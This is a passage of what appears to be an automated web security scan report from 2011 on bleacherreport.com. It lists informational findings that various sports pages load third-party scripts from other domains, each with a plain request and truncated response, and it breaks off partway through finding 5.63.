GET /articles/609576-daytona-500-dale-earnhardt-and-the-most-impressive-victories HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 88
ETag: "a6963a1cf35419d3c00bb63206e741b4"
Date: Tue, 15 Feb 2011 15:53:57 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 88005
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.42. http://bleacherreport.com/articles/609605-does-the-sec-have-the-three-best-football-programs-of-all-time  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609605-does-the-sec-have-the-three-best-football-programs-of-all-time

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/609605-does-the-sec-have-the-three-best-football-programs-of-all-time HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 548
ETag: "ab19fa1cf68c7a49ca8a5303e52de414"
Date: Tue, 15 Feb 2011 15:54:13 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 61605
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>
   <script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.43. http://bleacherreport.com/auto-racing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /auto-racing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /auto-racing HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 342
ETag: "eca00c0e90c63a0cace90505a5c76ede"
Date: Tue, 15 Feb 2011 15:54:51 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 64560
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.44. http://bleacherreport.com/br-swagger  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /br-swagger

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /br-swagger HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 51
ETag: "93e98aa4f8ed4af1ab06ab8e676dff98"
Date: Tue, 15 Feb 2011 15:55:10 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 55977
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.45. http://bleacherreport.com/brett-favre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /brett-favre

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /brett-favre HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 101
ETag: "1fc2897cb809c045e9769ab5f65301c1"
Date: Tue, 15 Feb 2011 15:57:54 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 60670
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.46. http://bleacherreport.com/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /careers

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /careers HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 48
ETag: "851eaf8f4da75143959932a90368aba3"
Date: Tue, 15 Feb 2011 15:56:07 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 46624
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.47. http://bleacherreport.com/college-basketball  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /college-basketball

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /college-basketball HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 660
ETag: "65e4ed4dfc1da12d19c1e27fa3188eef"
Date: Tue, 15 Feb 2011 15:54:19 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 79698
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.48. http://bleacherreport.com/college-football  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /college-football

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /college-football HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 500
ETag: "6a1d82b02c5a17087d9e3e3a3caf0c86"
Date: Tue, 15 Feb 2011 15:54:16 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 74654
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.49. http://bleacherreport.com/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /contact

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 45
ETag: "93675450841bf4a0bce315a82ece0b45"
Date: Tue, 15 Feb 2011 15:57:20 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 29406
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.50. http://bleacherreport.com/golf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /golf

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /golf HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 246
ETag: "ac3ce38afd742e2af5567390f64a5b15"
Date: Tue, 15 Feb 2011 15:54:22 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 72338
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.51. http://bleacherreport.com/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /local

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /local HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 49
ETag: "720363924f262c1ac5dc34fd31197391"
Date: Tue, 15 Feb 2011 15:57:41 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 41118
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.52. http://bleacherreport.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /login

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /login HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 37
ETag: "c62154808daf74af6addfeb9c63aca8e"
Date: Tue, 15 Feb 2011 15:54:15 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 29374
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.53. http://bleacherreport.com/miami-heat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /miami-heat

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /miami-heat HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 422
ETag: "feb0d0aa0b9b0a55f993453cb12e24b8"
Date: Tue, 15 Feb 2011 15:57:57 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 66079
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.54. http://bleacherreport.com/minnesota-vikings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /minnesota-vikings

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /minnesota-vikings HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 107
ETag: "6da1a367e35421aeb0775a9ed8e500de"
Date: Tue, 15 Feb 2011 15:57:57 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 60974
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.55. http://bleacherreport.com/mlb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /mlb

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mlb HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 86
ETag: "781a1e98e508d856af81687d76add94b"
Date: Tue, 15 Feb 2011 15:54:16 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 82309
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.56. http://bleacherreport.com/mma  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /mma

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mma HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 85
ETag: "ab82d97de5a065f7f1f4e30b34e76304"
Date: Tue, 15 Feb 2011 15:55:10 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 74688
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.57. http://bleacherreport.com/nascar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /nascar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /nascar HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 78
ETag: "4dd8e7d9a0701ce85c935c116330787e"
Date: Tue, 15 Feb 2011 15:55:26 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 69056
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.58. http://bleacherreport.com/nba  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /nba

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /nba HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 156
ETag: "a1fdba885c9902d4737624fa962b8757"
Date: Tue, 15 Feb 2011 15:54:17 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 84903
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.59. http://bleacherreport.com/nba-trade-rumors  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /nba-trade-rumors

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /nba-trade-rumors HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 515
ETag: "7c832fe0932b0fe291633c8522fd2c0e"
Date: Tue, 15 Feb 2011 15:55:13 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 64555
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.60. http://bleacherreport.com/nfl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /nfl

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /nfl HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 213
ETag: "383392aec409991e7044576502efbe30"
Date: Tue, 15 Feb 2011 15:54:15 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 69234
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.61. http://bleacherreport.com/nhl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /nhl

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /nhl HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 469
ETag: "72d0e3855e2a8bed04c345480f929fa9"
Date: Tue, 15 Feb 2011 15:54:18 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 86146
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.62. http://bleacherreport.com/pages/comguidelines  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/comguidelines

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pages/comguidelines HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 41
ETag: "c26cd533bed89ad975fc60c2d5abeb35"
Date: Tue, 15 Feb 2011 15:57:07 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 32800
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.63. http://bleacherreport.com/pages/featuredcolumnists  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/featuredcolumnists

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pages/featuredcolumnists HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
